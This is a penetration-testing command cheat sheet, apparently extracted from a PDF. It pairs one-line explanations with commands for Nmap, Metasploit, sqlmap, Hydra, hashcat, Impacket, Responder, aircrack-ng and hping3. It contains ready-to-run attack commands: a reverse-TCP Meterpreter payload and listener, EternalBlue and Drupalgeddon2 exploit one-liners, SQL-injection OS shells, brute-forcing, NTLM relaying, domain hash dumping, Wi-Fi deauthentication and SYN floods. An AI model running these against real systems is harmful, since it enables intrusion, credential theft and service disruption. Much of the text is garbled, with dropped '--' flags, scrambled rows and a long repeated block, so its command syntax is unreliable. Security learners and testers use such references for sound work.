Guide of Penetration Testing Commands

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Nmap Commands

No.	Command	Explanation
1	nmap -sP 192.168.1.0/24	Scan the network to discover active
		devices.
2	nmap -sS 192.168.1.1	Perform a TCP SYN scan to detect open ports on the device.
3	nmap -sV 192.168.1.1	Detect the versions of services running on open ports.
4	nmap -0 192.168.1.1	Determine the operating system used on the device.
5	nmap -A 192.168.1.1	Comprehensive scan including open ports, service versions, and OS detection.
6	nmap -Pn 192.168.1.1	Scan devices even if they do not respond to Ping requests.
7	nmap -sU 192.168.1.1	Scan for open UDP ports.
8	nmap -p- 192.168.1.1	Scan all ports (1-65535) instead of just default ports.
9	nmapscript vuln 192.168.1.1	Use scripts to check for vulnerabilities.
10	nmapscript smb-enum-shares -p 445 192.168.1.1	Enumerate SMB shares using Nmap script.
11	nmapscript http-enum -p 80 192.168.1.1	Enumerate web server directories using Nmap script.
12	nmapscript smb-vuln-ms17-010 192.168.1.1	Check for MS17-010 (EternalBlue) vulnerability.
13	nmapscript smb-vuln-cve-2017-7494 192.168.1.1	Check for CVE-2017-7494 (SambaCry) vulnerability.
14	nmapscript smb-vuln-ms08-067 192.168.1.1	Check for MS08-067 vulnerability.
15	nmapscript smb-vuln-ms10-061 192.168.1.1	Check for MS10-061 (Print Spooler) vulnerability.
16	nmapscript smb-vuln-regsvc-dos 192.168.1.1	Check for registry service DoS vulnerability.
17	nmapscript http-sql-injectionscript- args='http-sql-injection.args' -p 80 192.168.1.1	Check for SQL injection vulnerabilities using Nmap script.
18	nmap -sL 192.168.1.0/24	List all IPs in the subnet without scanning them.
19	nmap -p80script http-methods 192.168.1.1	Discover allowed HTTP methods on a web server.
20	nmap -p80script http-title 192.168.1.1	Retrieve the title of the webpage.
21	nmap -p80script http-headers 192.168.1.1	Retrieve HTTP headers from the server.
22	nmap -p80script http-enum 192.168.1.1	Enumerate common web applications on the server.
23	nmap -p80script http-auth 192.168.1.1	Test for HTTP authentication methods.
24	nmap -sX 192.168.1.1	Xmas scan to detect open ports.
25	nmap -sA 192.168.1.1	ACK scan to map firewall rulesets.

26	nmap -sW 192.168.1.1	Window scan to detect open ports based
		on TCP window size.
27	nmap -sM 192.168.1.1	Maimon scan to detect open ports using
		FIN/ACK flag combination.
28	nmap -p80script http-userdir-enum	Enumerate user directories on a web
	192.168.1.1	server.
29	nmap -p80script http-passwd 192.168.1.1	Check for /etc/passwd file on web server.
30	nmap -p80script http-robots.txt 192.168.1.1	Retrieve and analyze the robots.txt file.
31	nmapscript ssh-brute -p 22 192.168.1.1	Brute-force SSH login using Nmap script.
32	nmapscript ftp-anon 192.168.1.1	Check for anonymous FTP login.
33	nmapscript ftp-vsftpd-backdoor 192.168.1.1	Check for vsftpd backdoor vulnerability.
34	nmapscript http-sql-injectionscript-	Check for SQL injection vulnerabilities
	args='http-sql-injection.args' -p 80 192.168.1.1	using Nmap script.
35	nmapscript http-phpself-xss 192.168.1.1	Check for PHP_SELF XSS vulnerabilities.
36	nmapscript dns-brute 192.168.1.1	Perform DNS brute-force enumeration.
37	nmap -p 22script ssh-hostkey 192.168.1.1	Retrieve SSH host keys.
38	nmap -p 53script dns-recursion 192.168.1.1	Check for DNS recursion.
39	nmaptraceroute 192.168.1.1	Perform a traceroute along with the scan.
40	nmap -sn 192.168.1.0/24	Ping scan to discover live hosts without
		port scanning.

Metasploit Commands

No.	Command	Explanation
1	metasploit	Launch the Metasploit framework for exploit development and execution.
2	2 msfconsole Open the Metasploit con interface.	
3	msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe	Generate a Metasploit payload.
4	msfconsole -r script.rc	Run Metasploit commands from a script file.
5	msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"	Exploit EternalBlue vulnerability.
6	msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"	Setup and run a multi-handler for reverse TCP payloads.
7	msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"	Exploit SMB with psexec.
8	msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; set THREADS 10; run"	TCP port scan using Metasploit.
9	msfconsole -x "use auxiliary/scanner/http/http_version; set RHOSTS 192.168.1.0/24; run"	Scan HTTP versions on a network.
10	msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE /path/to/users.txt; set PASS_FILE /path/to/passwords.txt; run"	Brute-force FTP login.
11	msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE /path/to/users.txt; set PASS_FILE /path/to/passwords.txt; run"	Brute-force SSH login.
12	msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"	Scan SMB versions on a network.
13	msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"	Enumerate SMB shares on a network.
14	msfconsole -x "use auxiliary/scanner/smb/smb_enumusers; set RHOSTS 192.168.1.0/24; run"	Enumerate SMB users on a network.
15	msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"	Scan for RDP services on a network.
16	msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"	Exploit MS08-067 vulnerability.
17	msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"	Exploit vsftpd 2.3.4 backdoor.
18	msfconsole -x "use exploit/windows/dcerpc/ms03_026_dcom; set RHOST 192.168.1.1; exploit"	Exploit MS03-026 vulnerability.
19	msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"	Execute commands on Windows via SMB and psexec.

20	msfconsole -x "use	Exploit Shellshock vulnerability.
	exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST	
	192.168.1.1; exploit"	
21	msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue;	Exploit EternalBlue vulnerability.
	set RHOST 192.168.1.1; exploit"	
22	msfconsole -x "use exploit/multi/http/struts2_content_type_ognl;	Exploit Struts2 Content-Type
	set RHOST 192.168.1.1; exploit"	OGNL injection.
23	msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2;	Exploit Drupalgeddon2
	set RHOST 192.168.1.1; exploit"	vulnerability.
24	msfconsole -x "use exploit/multi/php/php_cgi_arg_injection; set	Exploit PHP CGI Argument
	RHOST 192.168.1.1; exploit"	Injection.
25	msfconsole -x "use	Exploit MS14-064 OLE Code
	exploit/windows/browser/ms14_064_ole_code_execution; set	Execution.
	RHOST 192.168.1.1; exploit"	

Nikto Commands

No.	Command	Explanation
1	nikto -h http://192.168.1.1	Scan web servers to detect vulnerabilities.
2	nikto -h http://192.168.1.1 -Plugins	Run specific plugins for detailed scanning.
3	nikto -h http://192.168.1.1 -C all	Comprehensive web server scan with all tests.
4	nikto -h http://192.168.1.1 -Tuning 1	Tune the scan to only check for interesting files.
5	nikto -h http://192.168.1.1 -Format msf+	Export vulnerabilities to Metasploit.
6	nikto -h http://192.168.1.1 -Plugins robots	Check for robots.txt vulnerabilities.
7	nikto -h http://192.168.1.1 -Plugins fileupload	Check for file upload vulnerabilities.
8	nikto -h http://192.168.1.1 -Plugins shellshock	Check for Shellshock vulnerability.
9	nikto -h http://192.168.1.1 -Plugins heartbleed	Check for Heartbleed vulnerability.
10	nikto -h http://192.168.1.1 -Plugins poodle	Check for POODLE vulnerability.
11	nikto -h http://192.168.1.1 -output report.html	Generate a vulnerability report for a web server.
12	nikto -h http://192.168.1.1 -Plugins cgi	Check for CGI vulnerabilities.
13	nikto -h http://192.168.1.1 -Plugins apache	Check for Apache-specific vulnerabilities.
14	nikto -h http://192.168.1.1 -Plugins iis	Check for IIS-specific vulnerabilities.
15	nikto -h http://192.168.1.1 -Plugins horde	Check for Horde-specific vulnerabilities.
16	nikto -h http://192.168.1.1 -Plugins nessus	Check for Nessus compatibility.
17	nikto -h http://192.168.1.1 -Plugins php	Check for PHP-specific vulnerabilities.
18	nikto -h http://192.168.1.1 -Plugins ssl	Check for SSL/TLS-specific vulnerabilities.
19	nikto -h http://192.168.1.1 -Plugins generic	Run generic tests for common vulnerabilities.
20	nikto -h http://192.168.1.1 -Plugins msf	Check for Metasploit integration.
21	nikto -h http://192.168.1.1 -Plugins tomcat	Check for Tomcat-specific vulnerabilities.

Sqlmap Commands

No.	Command	Explanation
1	sqlmap -u "http://192.168.1.1/vuln.php?id=1"dbs	Detect and exploit SQL injection
		vulnerabilities.
2	sqlmap -u "http://192.168.1.1/vuln.php?id=1"dump	Dump the database content after
	1	finding SQL injection.
3	sqlmap -u "http://192.168.1.1/vuln.php?id=1"os-shell	Obtain an OS shell through SQL
4	sqlmap -u "http://192.168.1.1/vuln.php?id=1"	injection.
4	tamper=space2comment	Bypass WAF by using tamper scripts.
5	sqlmap -u "http://192.168.1.1/vuln.php?id=1"hex	Use hexadecimal encoding for
	squiiap a neep.//192.100.11.1/vaiii.piip.ia 1 nex	payloads.
6	sqlmap -u "http://192.168.1.1/vuln.php?id=1"	Specify the DBMS to use specific
	dbms=mysql	payloads.
7	sqlmap -u "http://192.168.1.1/vuln.php?id=1"	Retrieve the DBMS user
	privileges	privileges.
8	sqlmap -u "http://192.168.1.1/vuln.php?id=1"level=5	Advanced SQL injection testing
	risk=3	with high risk and level.
9	sqlmap -u "http://192.168.1.1/vuln.php?id=1"	Retrieve DBMS password hashes.
10	passwords	Dotariovo DDMC volos
10	sqlmap -u "http://192.168.1.1/vuln.php?id=1"roles sqlmap -u "http://192.168.1.1/vuln.php?id=1"schema	Retrieve DBMS roles. Retrieve the DBMS schema.
11 12	sqlmap -u "http://192.168.1.1/vuln.php?id=1"schema sqlmap -u "http://192.168.1.1/vuln.php?id=1"count	Count the number of entries in
12	sqimap-u nttp.//192.100.1.1/vum.pnp:1u=1count	tables.
13	sqlmap -u "http://192.168.1.1/vuln.php?id=1"search -	Search for specific strings in the
	T usersstring="admin"	database.
14	sqlmap -u "http://192.168.1.1/vuln.php?id=1"batch	Run SQLmap in non-interactive
		mode.
15	sqlmap -u "http://192.168.1.1/vuln.php?id=1"delay=5	Add a delay between each
		request.
16	sqlmap -u "http://192.168.1.1/vuln.php?id=1"	Set a timeout for each request.
17	timeout=10 sqlmap -u "http://192.168.1.1/vuln.php?id=1"	Set the number of retries for
17	retries=3	each request.
18	sqlmap -u "http://192.168.1.1/vuln.php?id=1"tor	Use Tor network for anonymity.
19	sqlmap -u "http://192.168.1.1/vuln.php?id=1"check-	Check if the Tor network is used
	tor	correctly.
20	sqlmap -u "http://192.168.1.1/vuln.php?id=1"	Use a proxy for requests.
	proxy=http://127.0.0.1:8080	

Hydra Commands

No.	Command	Explanation
1	hydra -l admin -P /path/to/passwords.txt	Brute-force SSH login using a
	192.168.1.1 ssh	password list.
2	hydra -l admin -P /path/to/passwords.txt -s 2222	Brute-force SSH on a non-standard
	ssh://192.168.1.1	port.
3	hydra -l admin -P /path/to/passwords.txt http-	Brute-force HTTP GET authentication.
	get://192.168.1.1	
4	hydra -l admin -P /path/to/passwords.txt http-	Brute-force HTTP POST login form.
	post-form://192.168.1.1/login.php	
5	hydra -L users.txt -P passwords.txt 192.168.1.1 ssh	Brute-force SSH with multiple
		usernames.
6	hydra -L users.txt -P passwords.txt	Brute-force SMB authentication.
_	smb://192.168.1.1	D
7	hydra -l admin -P /path/to/passwords.txt	Brute-force FTP login.
0	ftp://192.168.1.1	Dunta fauga CCII lagin vaing Hydus
8	hydra -l admin -P /path/to/passwords.txt 192.168.1.1 ssh	Brute-force SSH login using Hydra.
9	hydra -l admin -P /path/to/passwords.txt http-	Brute-force HTTP GET login form.
,	get://192.168.1.1/login.php	brute-force III II del logiii foriii.
10	hydra -l admin -P /path/to/passwords.txt http-	Brute-force HTTP POST login form.
	post-form://192.168.1.1/login.php	Brace force in it i our login form.
11	hydra -l admin -P /path/to/passwords.txt -e nsr	Brute-force SSH with
	192.168.1.1 ssh	null/single/reverse password
		guesses.
12	hydra -l admin -P /path/to/passwords.txt -t 4	Set the number of parallel
	192.168.1.1 ssh	connections to 4 for SSH brute-
		forcing.
13	hydra -L users.txt -P passwords.txt http-	Brute-force HTTP GET login with
	get://192.168.1.1	multiple usernames.
14	hydra -L users.txt -P passwords.txt http-post-	Brute-force HTTP POST login with
	form://192.168.1.1/login.php	multiple usernames.
15	hydra -l admin -P /path/to/passwords.txt -f	Stop after the first found password for
1.0	192.168.1.1 ssh	SSH.
16	hydra -l admin -P /path/to/passwords.txt -s 21	Brute-force FTP login on port 21.
17	192.168.1.1 ftp hydra -L users.txt -P passwords.txt -o results.txt	Save results to a file.
17	192.168.1.1 ssh	Save results to a file.
18	hydra -l admin -P /path/to/passwords.txt -V	Verbose mode to show each attempt.
10	192.168.1.1 ssh	versose mode to show each attempt.
19	hydra -l admin -P /path/to/passwords.txt -M	Brute-force SSH on multiple targets
	targets.txt ssh	listed in a file.
20	hydra -l admin -P /path/to/passwords.txt -R	Restore a previous session.
	January to passivor asiate it	F

21	hydra -l admin -P /path/to/passwords.txt -e nsr 192.168.1.1 ssh	Brute-force SSH with null/single/reverse password guesses.
22	hydra -l admin -P /path/to/passwords.txt -t 4 192.168.1.1 ssh	Set the number of parallel connections to 4 for SSH bruteforcing.
23	hydra -L users.txt -P passwords.txt http- get://192.168.1.1	Brute-force HTTP GET login with multiple usernames.
24	hydra -L users.txt -P passwords.txt http-post- form://192.168.1.1/login.php	Brute-force HTTP POST login with multiple usernames.
25	hydra -l admin -P /path/to/passwords.txt -f 192.168.1.1 ssh	Stop after the first found password for SSH.
26	hydra -l admin -P /path/to/passwords.txt -s 21 192.168.1.1 ftp	Brute-force FTP login on port 21.
27	hydra -L users.txt -P passwords.txt -o results.txt 192.168.1.1 ssh	Save results to a file.
28	hydra -l admin -P /path/to/passwords.txt -V 192.168.1.1 ssh	Verbose mode to show each attempt.
29	hydra -l admin -P /path/to/passwords.txt -M targets.txt ssh	Brute-force SSH on multiple targets listed in a file.
30	hydra -l admin -P /path/to/passwords.txt -R	Restore a previous session.

John the Ripper Commands

No.	Command	Explanation	
1	john /path/to/hashfile	Crack password hashes using John the Ripper.	
2	johnwordlist=/path/to/wordlist /path/to/hashfile	Password cracking using a wordlist.	
3	johnformat=NT /path/to/hashfile	Crack NTLM password hashes.	
4	johnruleswordlist=/path/to/wordlist	Use wordlist and apply rules for	
	/path/to/hashfile	password cracking.	
5	johnshow /path/to/hashfile	Show cracked passwords from the hash	
		file.	
6	johnformat=raw-md5 /path/to/hashfile	Crack raw MD5 password hashes.	
7	johnincremental /path/to/hashfile	Use incremental mode for password cracking.	
8	johnsingle /path/to/hashfile	Use single crack mode for password cracking.	
9	johnwordlist=/path/to/wordlistrules /path/to/hashfile	Use wordlist with rules for password cracking.	
10	johnsession=custom_session /path/to/hashfile	Save the cracking session with a custom name.	
11	johnrestore=custom_session	Restore a saved cracking session.	
12	johnstatus=custom_session	Show the status of a cracking session.	
13	johnpot=/path/to/potfile /path/to/hashfile	Specify a custom pot file for cracked passwords.	
14	johnnolog /path/to/hashfile	Disable logging.	

Aircrack-ng Commands

No.	Command	Explanation	
1	aircrack-ng -a2 -b [BSSID] -w /path/to/wordlist.cap	Crack WPA/WPA2-PSK passwords.	
2	aircrack-ng -e SSID -w /path/to/wordlist /path/to/capture.cap	Crack WPA handshake with specific SSID.	
3	airodump-ng wlan0	Capture packets and display wireless networks.	
4	aireplay-ng -0 10 -a [BSSID] wlan0	Deauthenticate clients to capture handshakes.	
5	airodump-ng -c 6bssid [BSSID] -w capture wlan0	Capture packets on a specific channel and BSSID.	
6	aircrack-ng -z /path/to/capture.cap	Use PTW attack against WEP.	
7	aircrack-ng -k 1 /path/to/capture.cap	Use KoreK attack against WEP.	
8	airodump-ngband abg wlan0	Capture packets on all wireless bands (a, b, g).	
9	aireplay-ng -3 -b [BSSID] wlan0	Perform ARP replay attack to generate traffic.	
10	aireplay-ng -9 wlan0	Perform injection test to check if card supports injection.	
11	aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [MAC] wlan0	Fake authentication attack to associate with the AP.	
12	aireplay-ng -2 -r /path/to/arp-request wlan0	Interactive packet replay attack.	
13	airodump-ngwrite /path/to/output wlan0	Write captured packets to a file.	
14	airbase-ng -e "Free WiFi" -c 6 wlan0	Create a fake access point.	
15	airdecap-ng -e [SSID] /path/to/capture.cap	Decrypt WEP/WPA packets with known key.	

Wireshark and Tshark Commands

No.	Command	Explanation
1	wireshark	Network protocol analyzer for graphical packet capture and
		analysis.
2	tshark -i eth0	Command-line version of Wireshark.
3	tcpdump -i eth0	Capture network traffic on interface eth0.
4	tcpdump -i eth0 port 80	Capture network traffic on port 80.
5	tcpdump -i eth0 -w	Capture network traffic and save to file.
	capture.pcap	
6	tshark -r capture.pcap	Read and analyze a pcap file.

Other Commands

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No.	Command	Explanation
1	burpsuite	Launch Burp Suite for web
_		application security testing.
2	zaproxy	Launch OWASP ZAP for web
_		application security testing.
3	dirb http://192.168.1.1 /path/to/wordlist	Directory brute-forcing to discover
		hidden files and directories.
4	gobuster dir -u http://192.168.1.1 -w	Directory brute-forcing using
	/path/to/wordlist	Gobuster.
5	wfuzz -c -z file,/path/to/wordlist -u	Fuzzing tool for web application
	http://192.168.1.1/FUZZ	testing.
6	ffuf -w /path/to/wordlist -u	Fast web fuzzer for discovering
	http://192.168.1.1/FUZZ	hidden files and directories.
7	hping3 -S -p 80 -c 1 192.168.1.1	Send a single SYN packet to test if
		port 80 is open.
8	dnsenum example.com	DNS enumeration to gather
		information about a domain.
9	theHarvester -d example.com -l 500 -b google	Gather emails, subdomains, and
		other information from search
		engines.
10	maltego	Open-source intelligence (OSINT)
		and forensics application.
11	recon-ng	Web reconnaissance framework for
	, and the second	OSINT gathering.
12	crackmapexec smb 192.168.1.1 -u user -p password -	Enumerate SMB shares with
	-shares	credentials.
13	crackmapexec smb 192.168.1.1 -u user -p password -	Execute commands on the target
	-exec 'cmd.exe /c whoami'	via SMB.
14	responder -I eth0	Network poisoning tool to capture
	1	SMB/NTLM hashes.
15	ntlmrelayx.py -smb2support -i	Relay captured NTLM hashes to
	T T T T T T T T T T T T T T T T T T T	SMB service.
16	smbrelayx.py -h 192.168.1.1 -c "whoami"	Relay NTLM hashes to execute
	7, 13	commands on the target.
17	responder -I eth0 -w	Run Responder in full analysis
·	1	mode.
18	hashcat -a 0 -m 0 /path/to/hashfile	High-performance password
	/path/to/wordlist	cracking.
19	hashcat -a 3 -m 0 /path/to/hashfile ?a?a?a?a?a?a	Mask attack with brute-force for
1,	named a o m o pacifico manine rararara	passwords of length 6.
20	hashcat -a 3 -m 1000 /path/to/hashfile ?!?!?!?l	Mask attack with lowercase letters
20	nasneat -a 3 -iii 1000 / patii/ tu/ nasnine (1(1(1))	for NTLM hashes.
21	hasheat a 0 m 1900 /nath /to /hashfile	
21	hashcat -a 0 -m 1800 /path/to/hashfile	Dictionary attack on SHA-512
	/path/to/wordlist	hashes.

22	hashcat -a 1 -m 0 /path/to/hashfile	Combinator attack using two
	/path/to/wordlist /path/to/rules	wordlists.
23	hashcat -a 6 -m 0 /path/to/hashfile /path/to/wordlist ?d?d	Hybrid attack with dictionary and 2-digit suffix.
24	hcxdumptool -i wlan0 -o capture.pcapng	Capture handshakes and PMKID for
	enable_status=1	WPA cracking.
25	hcxtools -m /path/to/pmkid	Extract PMKID from the capture
	/path/to/capture.pcapng	file.
26	reaver -i wlan0 -b [BSSID] -vv	Perform a brute-force attack on WPS PIN.
27	wifite	Automated wireless attack tool to crack WEP/WPA/WPA2.
28	legion	Automated network penetration testing framework.
29	patator	Multi-purpose brute-forcer and enumerator.
30	medusa -h 192.168.1.1 -u admin -P	Brute-force SSH login using
	/path/to/passwords.txt -M ssh	Medusa.
31	bloodhound-python -d example.com -u user -p password -c all	Active Directory enumeration tool.
32	impacket-getTGT user	Get a Kerberos TGT using Impacket.
	-dc-ip 192.168.1.1	
33	impacket-secretsdump -just-dc-ntlm 192.168.1.1	Dump NTLM hashes from a domain controller.
34	impacket-psexec -target 192.168.1.1 -u user -p password	Remote command execution via SMB.
35	impacket-wmiexec -target 192.168.1.1 -u user -p password	Remote command execution via WMI.
26	impacket-smbexec -target 192.168.1.1 -u user -p	Remote command execution via
36	password	SMB.
37	sslscan 192.168.1.1	SSL/TLS scanner to detect
		supported protocols and ciphers.
38	sslyzeregular 192.168.1.1	SSL/TLS configuration scanner.
39	openssl s_client -connect 192.168.1.1:443	Test SSL/TLS connection to a server.
40	testssl.sh 192.168.1.1	Test SSL/TLS security on a server.
41	curl -I http://192.168.1.1	Fetch HTTP headers to gather
41	curr-rmup://192.108.1.1	information about the server.
42	curl -X POST -d "username=admin&password=1234" http://192.168.1.1/login.php	Send HTTP POST request to login form.
42		Download a file from a web server.
43	curl -0 http://192.168.1.1/file.txt	
44	curl -H "User-Agent: Mozilla/5.0" http://192.168.1.1	Send a request with a custom User-Agent header.
45	curl -k https://192.168.1.1	Ignore SSL certificate errors.
46	dirb http://192.168.1.1 /path/to/wordlist	Directory brute-forcing to discover hidden files and directories.
		I .

47	gobuster dir -u http://192.168.1.1 -w /path/to/wordlist	Directory brute-forcing using Gobuster.
48	wfuzz -c -z file,/path/to/wordlist -u http://192.168.1.1/FUZZ	Fuzzing tool to discover hidden files or directories.
4.0	1 , ,	
49	ffuf -w /path/to/wordlist -u	Fast web fuzzer for discovering
	http://192.168.1.1/FUZZ	hidden files and directories.
50	wfuzz -c -z file,/path/to/wordlist -b "cookie=SESSIONID" -u http://192.168.1.1/FUZZ	Fuzz URLs with session cookies.
F 4		A OVALACDIZAD
51	zap-baseline.py -t http://192.168.1.1	Automated scan using OWASP ZAP baseline scan.
52	droopescan scan drupal -u http://192.168.1.1	Scan Drupal CMS for vulnerabilities.
53	joomscanurl http://192.168.1.1	Scan Joomla CMS for vulnerabilities.
54	wpscanurl http://192.168.1.1enumerate u	Enumerate WordPress users.
55	wpscanurl http://192.168.1.1plugins-detection	Detect WordPress plugins.
33	mixed	Detect Wordt ress plugilis.
56	searchsploit	Search for exploit code using
		Exploit-DB.
57	searchsploit -m 12345	Mirror an exploit to the current
	•	directory.
58	ike-scan 192.168.1.1	Scan and identify IKE VPN servers.
59	yersinia	Network attack tool for Layer 2
	y or online	protocols.
60	mitmf	Man-in-the-middle framework for
00	micini	network attacks.
<i>C</i> 4	setoolkit	
61	Setooikit	Social engineering toolkit for
		phishing and other attacks.
62	beef	Browser Exploitation Framework
		for client-side attacks.
63	netcat -nv 192.168.1.1 80	Simple TCP connection to test a
		specific port.
64	netcat -lvp 4444	Listen for incoming connections on
		port 4444.
65	netcat -zv 192.168.1.1 1-65535	Scan all ports using Netcat.
66	smbclient -L //192.168.1.1 -U username	List SMB shares on a remote server.
67	smbmap -H 192.168.1.1 -u username -p password	Enumerate SMB shares and
	r r	permissions.
68	impacket-smbclient //192.168.1.1/share -user	SMB client from Impacket toolkit.
	username	·
69	ldapsearch -h 192.168.1.1 -x -b	LDAP enumeration.
	"dc=example,dc=com"	
70	cewl http://192.168.1.1 -w wordlist.txt	Generate a custom wordlist from a
		website.
71	wfuzz -c -z file,/path/to/wordlist -u	Fuzz URLs for hidden files and
	http://192.168.1.1/FUZZ	directories.
72	dnsenum example.com	DNS enumeration tool for finding
, 2	anseram example.com	subdomains.
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73	dnsrecon -d example.com -t brt -D /path/to/wordlist.txt	Brute-force DNS subdomains.
74	dnsenumenum example.com	Comprehensive DNS enumeration.
75	dnsmap example.com	DNS mapping and subdomain discovery tool.
76	masscan -p1-65535 192.168.1.1	Fast port scanner for large networks.
77	zmap -p 80 192.168.1.0/24	Fast network scanner focused on speed.
78	recon-ng	Web reconnaissance framework for information gathering.
79	fping -a -g 192.168.1.0/24	Ping sweep to discover live hosts.
80	hping3 -1 192.168.1.1	Send ICMP echo request to test connectivity.
81	hping3 -S 192.168.1.1 -p 80	Send TCP SYN packet to test if port 80 is open.
82	hping3 -A 192.168.1.1 -p 80	Send TCP ACK packet to test if port 80 is open.
83	hping3 -2 192.168.1.1 -p 53	Send UDP packet to test if port 53 is open.
84	hping3 -8 80 -c 1000 -S 192.168.1.1	Send 1000 SYN packets to port 80 to test for SYN flood.
85	hping3 -Q -p 80 -s 192.168.1.1	Sequence number analysis for TCP ports.
86	fping -a -g 192.168.1.0/24	Ping sweep to discover live hosts.
87	hping3flood -V -p 80 192.168.1.1	Send continuous SYN packets to flood a specific port.
88	masscan -p80,443 192.168.1.0/24	Fast port scanner for large networks.
89	zmap -p 80 192.168.1.0/24	Fast network scanner focused on speed.
90	whois example.com	Retrieve domain registration information.
91	dig example.com any	Retrieve DNS records for a domain.
92	nslookup example.com	Retrieve DNS records using nslookup.
93	fierce -dns example.com	DNS reconnaissance and enumeration tool.
94	dmitry -winsepfb http://192.168.1.1	Deepmagic Information Gathering Tool.
95	theHarvester -d example.com -l 500 -b google	Gather emails, subdomains, and other information from search engines.
96	maltego	Open-source intelligence and forensics application.
97	spiderfoot	Automate OSINT gathering and analysis.

98	ike-scan 192.168.1.1	Scan and identify IKE VPN servers.
99	searchsploit	Search for exploit code using
		Exploit-DB.
100	searchsploit -m 12345	Mirror an exploit to the current
	•	directory.
101	setoolkit	Social engineering toolkit for
		phishing and other attacks.
102	beef	Browser Exploitation Framework
102	beer	for client-side attacks.
102	notest 221021001100	
103	netcat -nv 192.168.1.1 80	Simple TCP connection to test a
		specific port.
104	netcat -lvp 4444	Listen for incoming connections on
		port 4444.
105	netcat -zv 192.168.1.1 1-65535	Scan all ports using Netcat.
106	smbclient -L //192.168.1.1 -U username	List SMB shares on a remote server.
107	smbmap -H 192.168.1.1 -u username -p password	Enumerate SMB shares and
		permissions.
108	impacket-smbclient //192.168.1.1/share -user	SMB client from Impacket toolkit.
	username	•
109	ldapsearch -h 192.168.1.1 -x -b	LDAP enumeration.
	"dc=example,dc=com"	2211 01141101411011
110	cewl http://192.168.1.1 -w wordlist.txt	Generate a custom wordlist from a
110	tewi http://192.100.1.1 -w wordinst.txt	website.
111	rufuzz c z filo /noth /to /wordlist u	Fuzz URLs for hidden files and
111	wfuzz -c -z file,/path/to/wordlist -u	directories.
440	http://192.168.1.1/FUZZ	
112	dnsenum example.com	DNS enumeration tool for finding
		subdomains.
113	dnsrecon -d example.com -t brt -D	Brute-force DNS subdomains.
	/path/to/wordlist.txt	
114	dnsenumenum example.com	Comprehensive DNS enumeration.
115	dnsmap example.com	DNS mapping and subdomain
		discovery tool.
116	masscan -p1-65535 192.168.1.1	Fast port scanner for large
		networks.
117	zmap -p 80 192.168.1.0/24	Fast network scanner focused on
		speed.
118	recon-ng	Web reconnaissance framework for
		information gathering.
119	fping -a -g 192.168.1.0/24	Ping sweep to discover live hosts.
120	hping3 -1 192.168.1.1	Send ICMP echo request to test
120	mpmgo 1 172.100.1.1	connectivity.
121	hning2 \$10216811 n 00	Send TCP SYN packet to test if port
121	hping3 -S 192.168.1.1 -p 80	•
400	1	80 is open.
122	hping3 -A 192.168.1.1 -p 80	Send TCP ACK packet to test if port
		80 is open.
123	hping3 -2 192.168.1.1 -p 53	Send UDP packet to test if port 53 is
		open.

124	hping3 -8 80 -c 1000 -S 192.168.1.1	Send 1000 SYN packets to port 80 to test for SYN flood.
125	hping3 -Q -p 80 -s 192.168.1.1	Sequence number analysis for TCP ports.
126	fping -a -g 192.168.1.0/24	Ping sweep to discover live hosts.
127	hping3flood -V -p 80 192.168.1.1	Send continuous SYN packets to flood a specific port.
128	masscan -p80,443 192.168.1.0/24	Fast port scanner for large networks.
129	zmap -p 80 192.168.1.0/24	Fast network scanner focused on speed.
130	whois example.com	Retrieve domain registration information.
131	dig example.com any	Retrieve DNS records for a domain.
132	nslookup example.com	Retrieve DNS records using
		nslookup.
133	fierce -dns example.com	DNS reconnaissance and enumeration tool.
134	dmitry -winsepfb http://192.168.1.1	Deepmagic Information Gathering
134	unitery -winsepib neep.//172.100.1.1	Tool.
135	theHarvester -d example.com -l 500 -b google	Gather emails, subdomains, and other information from search engines.
136	maltego	Open-source intelligence and forensics application.
137	spiderfoot	Automate OSINT gathering and analysis.
138	ike-scan 192.168.1.1	Scan and identify IKE VPN servers.
139	searchsploit	Search for exploit code using Exploit-DB.
140	searchsploit -m 12345	Mirror an exploit to the current directory.
141	responder -I eth0	Network poisoning tool to capture SMB/NTLM hashes.
142	ntlmrelayx.py -smb2support -i	Relay captured NTLM hashes to SMB service.
143	smbrelayx.py -h 192.168.1.1 -c "whoami"	Relay NTLM hashes to execute commands on the target.
144	responder -I eth0 -w	Run Responder in full analysis mode.
145	hashcat -a 0 -m 0 /path/to/hashfile /path/to/wordlist	High-performance password cracking.
146	hashcat -a 3 -m 0 /path/to/hashfile ?a?a?a?a?a?a	Mask attack with brute-force for passwords of length 6.
147	hashcat -a 3 -m 1000 /path/to/hashfile ?l?l?l?l	Mask attack with lowercase letters for NTLM hashes.

148	hashcat -a 0 -m 1800 /path/to/hashfile	Dictionary attack on SHA-512
	/path/to/wordlist	hashes.
149	hashcat -a 1 -m 0 /path/to/hashfile	Combinator attack using two
	/path/to/wordlist /path/to/rules	wordlists.
150	hashcat -a 6 -m 0 /path/to/hashfile	Hybrid attack with dictionary and
	/path/to/wordlist?d?d	2-digit suffix.
151	setoolkit	Social engineering toolkit for
		phishing and other attacks.
152	beef	Browser Exploitation Framework
		for client-side attacks.
153	netcat -nv 192.168.1.1 80	Simple TCP connection to test a
		specific port.
154	netcat -lvp 4444	Listen for incoming connections on
